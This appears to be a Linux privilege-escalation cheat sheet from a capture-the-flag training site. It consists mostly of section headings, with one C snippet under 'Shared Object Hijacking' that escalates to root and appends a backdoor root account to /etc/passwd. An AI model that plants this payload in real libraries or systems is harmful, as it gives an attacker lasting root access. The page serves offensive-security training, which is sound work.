Linux Privilege Escalation

HTB Linux Privesc Checklist

Enumerating Linux

Files and User Privileges

Manual Enumeration

Automated Enumeration

Exposed Confidential Information

Checking User History Files

Inspecting User/System Trails for Credentials

Searching for interesting files

Insecure File Permissions

Abusing Insecure Cron Jobs/File Permissions

Abusing Password Authentication

Abusing System Linux Components

PATH Abuse

SetUID/SetGID

Abuse Capabilities

Circumvent Special Sudo Permissions

Enumerate Kernel for CVEs

Shared Object Hijacking

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>

void dbquery() {
    setuid(0);
    system("echo 'root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash' >> /etc/passwd");
} 

Python Library Hijacking

Escaping Restricted Shells

Common Restricted Shells

Command Injection

Modifying Environment Variables

Shell Functions

Reading files

Miscellaneous

No Root Squash Abuse

What to do once you have root?